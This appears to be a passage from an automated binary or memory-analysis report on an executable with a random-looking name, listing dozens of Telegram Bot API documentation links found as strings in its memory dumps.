            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2702275438.000001E7D9900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#forumtopicreopened
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2702275438.000001E7D9900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#generalforumtopichidden
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2702275438.000001E7D9900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#generalforumtopicunhidden
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D2100000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923521936.000001E7D2113000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#getbusinessconnection
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923291891.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D201E000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925375209.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D201B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#getchatmembercount
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923291891.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D201E000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925375209.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D201B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#getchatmenubutton
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#getgamehighscores
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923291891.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D201E000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925375209.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D201B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#getmydefaultadministratorrights
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922413448.000001E7D21B4000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D21C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#getupdates
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923291891.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D201E000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925375209.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D201B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#getuserchatboosts
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922858841.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#giveaway
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#giveawaycompleted
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922858841.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#giveawaywinners
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D2100000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923521936.000001E7D2113000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#hidegeneralforumtopic
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D2194000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#inaccessiblemessage
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923291891.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D201E000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925375209.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922858841.000001E7D2E24000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D201B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#inlinekeyboardbutton
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923291891.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D201E000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925375209.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D201B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#inlinequeryresult
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922858841.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#inlinequeryresultsbutton
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923291891.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D21C9000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922858841.000001E7D2E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#inputmediaanimation
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2691245666.000001E7D28C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#inputpaidmedia
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921971752.000001E7D2E6C000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922174463.000001E7D2E6A000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2692536199.000001E7D30DC000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922858841.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2E6A000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#inputpaidmediaphoto
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921971752.000001E7D2E6C000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922174463.000001E7D2E6A000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2E6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#inputpaidmediavideo
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922858841.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#linkpreviewoptions
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923291891.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922858841.000001E7D2E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#maskposition
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2691245666.000001E7D28C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#menubuttoncommands
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2691245666.000001E7D28C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#menubuttondefault
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D2100000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923521936.000001E7D2113000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#menubuttonwebapp
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#messageautodeletetimerchanged
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2684919268.000001E7D16EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#messageorigin
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#messagereactioncountupdated
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922858841.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#messagereactionupdated
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#paidmedia
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#paidmediainfo
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925375209.000001E7D21B4000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922413448.000001E7D21B4000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D2194000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#paidmediaphoto
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921971752.000001E7D2E6C000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922174463.000001E7D2E6A000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922858841.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2E6A000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#paidmediapreview
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#paidmediavideo
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922413448.000001E7D21B4000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D21C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#polloption
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#promotechatmember
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#reactioncount
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2702275438.000001E7D9900000.00000004.00001000.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2691245666.000001E7D28C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#reactiontype
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#reactiontypecustomemoji
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2691245666.000001E7D28C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#reactiontypeemoji
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921971752.000001E7D2E6C000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922174463.000001E7D2E6A000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2E6A000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#refundedpayment
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D2100000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923521936.000001E7D2113000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#reopengeneralforumtopic
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D2100000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923521936.000001E7D2113000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#replykeyboardremove
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D21C9000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922858841.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#replyparameters
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#restrictchatmember
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922858841.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#revenuewithdrawalstate
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922858841.000001E7D2E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#revenuewithdrawalstatefailed
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922858841.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#revenuewithdrawalstatepending
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922858841.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#revenuewithdrawalstatesucceeded
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#sendanimation
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#sendchataction
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#sendgame
